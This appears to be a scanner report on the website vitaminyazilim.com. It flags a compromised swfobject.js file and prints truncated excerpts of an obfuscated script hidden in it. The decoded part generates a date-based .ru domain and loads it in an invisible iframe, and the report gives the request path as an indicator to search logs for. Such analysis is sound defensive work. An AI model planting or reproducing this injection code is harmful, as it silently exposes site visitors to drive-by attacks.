Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vitaminyazilim.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vitaminyazilim.com/ | 200 OK Content-Length: 12375 Content-Type: text/html | clean |
http://vitaminyazilim.com/swfobject.js | 200 OK Content-Length: 13358 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpts below are truncated by the scanner; "[…]" marks each cut.
Start of the file (the SWFObject library code), followed by the tail of the obfuscated script found in the same file:
if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object(); deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){ if (!document.getElementById) { return; } this.DETECT_KEY = detectKey ? detectKey : 'detectflash'; this.skipDetect = deconc […]
[…] r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s);
Decoded script:
function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb […]
[…] var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */
Note: the decoded script seeds a pseudo-random generator from the month, the day of the month and whether the hour is past 12, uses it to build a 16-character host name (the "ru" argument is presumably the top-level domain), and loads "/runforestrun?sid=cx" from that host in a hidden, zero-size iframe. Because the host name changes with the date, the constant request path is the more stable indicator to look for in proxy or web logs when checking whether visitors were affected.
Antivirus reports:
| ||
http://vitaminyazilim.com/Default.aspx | 200 OK Content-Length: 12375 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=69 | 200 OK Content-Length: 5258 Content-Type: text/html | clean |
http://vitaminyazilim.com/Contact.aspx | 200 OK Content-Length: 6650 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=76 | 200 OK Content-Length: 10327 Content-Type: text/html | clean |
http://vitaminyazilim.com/WebResource.axd?d=p4wrJdeziKavF9pXkQWRD7MiQj9ywl-kKpEDZICy-WPJydC4_0eLmy2WZX8GhR3Wc2cnEFyjKp0o3GaRDR01RNcFe481&t=634605294834856163 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://vitaminyazilim.com/WebResource.axd?d=3ehzONPtbK85E5d5814USDqM-sEMmyLKNzYiaUEL14Jo6kFRSOlu1vJu4wA8vdGFFiR4cjm_GSQ2s_deOGDQVOYDTJE1&t=634605294834856163 | 200 OK Content-Length: 33247 Content-Type: application/x-javascript | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=71 | 200 OK Content-Length: 15306 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=72 | 200 OK Content-Length: 12313 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=74 | 200 OK Content-Length: 10072 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=73 | 200 OK Content-Length: 9825 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=50 | 200 OK Content-Length: 10159 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=51 | 200 OK Content-Length: 13067 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=52 | 200 OK Content-Length: 11284 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vitaminyazilim.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 25 Feb 2015 05:30:22 GMT
Server: Microsoft-IIS/7.0
Content-Length: 12375
Content-Type: text/html; charset=windows-1254
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...12375 bytes of data.
GET / HTTP/1.1
Host: vitaminyazilim.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 25 Feb 2015 05:30:22 GMT
Server: Microsoft-IIS/7.0
Content-Length: 12375
Content-Type: text/html; charset=windows-1254
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...12375 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vitaminyazilim.com
Referer: http://www.google.com/search?q=vitaminyazilim.com
Result:
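The result is similar to the first query. No suspicious redirects were found. Note that this check varies only the Referer header, so a redirect that depends on other request properties would not be detected by it.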
GET / HTTP/1.1
Host: vitaminyazilim.com
Referer: http://www.google.com/search?q=vitaminyazilim.com
Result:
The result is similar to the first query. There are no suspicious redirects found.